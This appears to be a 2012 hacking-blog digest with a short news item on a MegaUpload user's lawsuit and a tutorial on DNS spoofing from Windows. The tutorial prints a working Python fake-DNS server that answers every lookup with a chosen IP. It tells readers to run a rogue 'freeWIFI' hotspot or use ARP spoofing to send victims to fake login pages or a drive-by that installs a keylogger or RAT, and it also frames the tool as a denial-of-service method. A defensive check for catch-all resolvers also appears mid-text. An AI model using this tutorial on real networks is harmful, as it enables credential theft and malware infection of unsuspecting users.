Saturday, 06 October 2012

egyhacks.net


MegaUpload Users Are One Step Closer to Getting Their Data Back

Posted: 05 Oct 2012 09:29 PM PDT



There's now some hope that MegaUpload users will get their data back, even though it's a slim one. At the very least, the lawsuit brought against the US government by one MegaUpload user is going forward as the judge in the case said that hearings were needed to decide who was responsible for the data and what to do with it.

The Electronic Frontier Foundation filed a motion to get the data back in the name of one MegaUpload user, Kyle Goodwin, who lost many hours of sports footage he needed for his work.

The government, understandably, is waiving any responsibility and says users should talk to MegaUpload or Carpathia Hosting, the hosting company MegaUpload used before being taken down.

MegaUpload, the company, is pretty much dead and couldn't access the data even if it wanted to, since it's been seized by the US government and it hasn't been able to pay the hosting bills, so going after MegaUpload would be pointless.

Suing Carpathia is equally pointless: it still wants to get paid for keeping over 1,000 servers on the sideline for nine months, and it can't hand over the data to anyone but MegaUpload, who owns it, due to privacy laws.

The judge is having a tough time determining who's to blame and how to proceed, which is why he's going ahead with evidentiary hearings, something the government tried to prevent.

"The Court stated today that it will hold a hearing to find out the details about Mr. Goodwin's property - where it is, what happened when the government denied him access to it, and whether and how he can get it back," the EFF wrote.

"The Court has asked Mr. Goodwin and the government to each propose a format for the hearing, which remains unscheduled at this point," it said.

Enjoy.......

DNS Spoofing Using Windows (Tutorial)

Posted: 05 Oct 2012 04:51 PM PDT



Hi all users, in today's post we'll learn what DNS spoofing is and how to do it; we have tried to make it as simple as we can. So let's get started. I believe people need to know how to do that cool stuff (DNS spoofing) using Windows :)

REQUIRES:
This tutorial requires one or two wireless adapters (if not two, then one wireless adapter and a normal wired LAN adapter), and you must have Python installed on your computer. Furthermore, you should have some kind of web server on your computer (any kind).

NEED TO KNOW:
When a computer wants to open a webpage, for instance, it needs to know the web server's IP address. It gets the IP address from the DNS server. A DNS server is a domain name server, i.e. it receives requests for domains and returns the correct IP address for that domain. After that process, the computer can connect to that server and request the webpage it wants.

So when your computer wants to open up http://www.google.com, it sends a request to a DNS server, and the answer it gets is the IP address that belongs to google.com. Every LAN has a DNS server, and usually the wireless access point acts as a DNS server, but a computer can also use a DNS server that is outside the LAN.

WHAT WILL WE BE DOING?:
We will be running a Python script that acts as a DNS server, but the script will return the IP address that you set it to return, no matter what domain is requested.

I do not take credit for the script; I am only telling how to use it. The Python script we will be using is from code.activestate.com

# Python 2 script (print statements; packets are handled as str)
import socket

class DNSQuery:
    def __init__(self, data):
        self.data = data
        self.dominio = ''

        tipo = (ord(data[2]) >> 3) & 15   # Opcode bits
        if tipo == 0:                     # Standard query
            ini = 12                      # Question section starts after the 12-byte header
            lon = ord(data[ini])          # Length of the first label
            while lon != 0:
                self.dominio += data[ini+1:ini+lon+1] + '.'
                ini += lon + 1
                lon = ord(data[ini])

    def respuesta(self, ip):
        packet = ''
        if self.dominio:
            #print self.dominio
            packet += self.data[:2] + "\x81\x80"   # Same transaction ID, response flags
            packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'   # Questions and Answers Counts
            packet += self.data[12:]   # Original Domain Name Question
            packet += '\xc0\x0c'       # Pointer to domain name
            packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'   # Response type, ttl and resource data length -> 4 bytes
            packet += str.join('', map(lambda x: chr(int(x)), ip.split('.')))   # 4 bytes of IP
        return packet

if __name__ == '__main__':
    ip = 'INSERT_YOUR_OWN_IP_HERE'
    print 'pyminifakeDNS:: dom.query. 60 IN A %s' % ip

    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udps.bind(('', 53))

    try:
        while 1:
            data, addr = udps.recvfrom(1024)
            p = DNSQuery(data)
            #print p
            udps.sendto(p.respuesta(ip), addr)
            print 'Respuesta: %s -> %s' % (p.dominio, ip)
    except KeyboardInterrupt:
        print 'Finalizando'
        udps.close()


WHAT TO DO NEXT:
Insert the "answer" IP in the script --> ip='INSERT_YOUR_OWN_IP_HERE' That IP is the one that your DNS server will reply with, no matter what domain is requested! (This is not the IP of the one you want to attack!)

Now the usage of this is quite obvious, and here are some examples : When you run the script, it will start acting as a real DNS-server.

One way to use it would be to set up an ad-hoc wi-fi network with internet sharing enabled, and you call the network by some nice name like "freeWIFI". Make sure that you are running the python script first, otherwise windows will make its own DNS-server and bind it to port 53! So if you are connected to some free access point (or a cabled LAN), you will be able to share that connection over your (other) wi-fi card. When somebody connects to your wi-fi and tries to open a webpage, any page, they get your page, that might contain a java drive-by, that installs a keylogger or RAT, or it could be a fake login-page of some kind.

This would require that you have 2 network cards, perhaps one wi-fi and one cabled, or two wi-fi cards. Basically you need to have a proper internet connection that is shared, and you will be sharing the internet connection to anyone who connects to your ad-hoc wi-fi network, but when they try to open a webpage, they will get your webpage instead.

NOTE: The webpage that is shown will always show the requested address in the address bar; don't take my word for it, just test it! It will not show the address of the real server that opened. If you write "www.google.com" it will open your webpage instead, but still show "www.google.com" in the address bar. (Just like using the HOSTS file to redirect, I guess.)

Make sure that the ip you set it to be, really does host some website, otherwise this will be just a DENIAL OF SERVICE, no connection etc. You could deliberately set the ip address to be "127.0.0.1" and make it a type of DENIAL OF SERVICE, since that would redirect any domain to localhost, so that could actually be another use.
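A defender's check for the behaviour described above (every requested name gets the same A record): ask the resolver for a canary name under the reserved `.invalid` TLD, which a legitimate resolver answers with NXDOMAIN, and flag any resolver that returns an address instead. This is an added example, not part of the original post or the ActiveState script; the function names, the canary name and the packet bytes are constructed for illustration.

```python
import struct

def read_name(pkt, off):
    """Decode a (possibly compressed) DNS name; return (name, next offset)."""
    labels, end, hops = [], None, 0
    while True:
        n = pkt[off]
        if (n & 0xC0) == 0xC0:               # compression pointer, e.g. \xc0\x0c
            end = off + 2 if end is None else end
            off = ((n & 0x3F) << 8) | pkt[off + 1]
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
        elif n == 0:
            return ".".join(labels), (off + 1 if end is None else end)
        else:
            labels.append(pkt[off + 1:off + 1 + n].decode("ascii", "replace"))
            off += 1 + n

def parse_response(pkt):
    """Return (qname, rcode, [IPv4 strings from A records])."""
    _id, flags, qd, an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    off, qname = 12, ""
    for _ in range(qd):
        qname, off = read_name(pkt, off)
        off += 4                             # skip QTYPE and QCLASS
    ips = []
    for _ in range(an):
        _, off = read_name(pkt, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:        # A record
            ips.append(".".join(str(b) for b in pkt[off:off + 4]))
        off += rdlen
    return qname, flags & 0x000F, ips

def resolver_is_catch_all(canary_responses):
    """True if a canary name under .invalid got an address, not NXDOMAIN."""
    for pkt in canary_responses:
        qname, rcode, ips = parse_response(pkt)
        if qname.endswith(".invalid") and rcode == 0 and ips:
            return True
    return False

# Constructed sample packets (not captured traffic); 192.0.2.10 is a documentation address.
QUESTION = b"\x08canary01\x07invalid\x00\x00\x01\x00\x01"
SPOOFED = (b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00" + QUESTION +
           b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04\xc0\x00\x02\x0a")
NXDOMAIN = b"\x12\x34\x81\x83\x00\x01\x00\x00\x00\x00\x00\x00" + QUESTION
```

Captive portals and resolvers that rewrite NXDOMAIN answers also trip this check, so a positive result means the resolver's answers should not be trusted on that network, not that a specific tool is in use.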

If you do not already have a proper shareable internet connection (maybe you only have one wi-fi card) and you are "on the go", in a shopping mall or a park, you would need to have a webserver installed locally on your PC, so that you could redirect all DNS-requested domains to your PC. You can use any webserver, Apache for Windows or Hiawatha (with PHP). You can host your java drive-by locally, and infect other computers while on the go, without really having a real internet connection to share.

Another use would be if you are connected to someone else's wi-fi, and you can use ARP spoofing. Since the ones you are ARP-spoofing assume that you are the network access point, all DNS requests will go to you, instead of the real access point.

I believe you get the point. There are many ways to have fun with this. I am actually developing a C# DNS-server with custom rewrites, that in contrast to the Python script, actually returns the correct IP when it is not in the custom-rewrite list! But I will keep it to myself for now :)

Enjoy.......
